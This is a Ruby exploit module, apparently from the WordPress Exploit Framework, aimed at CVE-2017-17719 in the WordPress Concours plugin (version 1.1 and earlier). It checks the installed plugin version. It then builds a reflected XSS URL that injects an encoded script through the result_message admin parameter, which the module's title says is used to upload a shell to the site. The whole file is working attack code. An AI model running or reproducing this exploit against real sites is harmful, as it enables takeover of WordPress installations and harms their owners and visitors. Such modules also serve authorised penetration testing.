# frozen_string_literal: true

class Wpxf::Exploit::ConcoursReflectedXssShellUpload < Wpxf::Module
  include Wpxf::WordPress::ReflectedXss

  def initialize
    super

    update_info(
      name: 'WordPress Concours <= 1.1 Reflected XSS Shell Upload',
      author: [
        'Nicolas Buzy-Debat', # Dislosure
        'rastating'           # WPXF module
      ],
      references: [
        ['CVE', '2017-17719'],
        ['WPVDB', '8981']
      ],
      date: 'Dec 19 2017'
    )
  end

  def check
    check_plugin_version_from_readme('wp-concours', '1.2')
  end

  def xss_payload
    url_encode("<script>#{xss_ascii_encoded_include_script}</script>")
  end

  def url_with_xss
    "#{wordpress_url_admin_options}?page=concours&result_message=#{xss_payload}"
  end
end
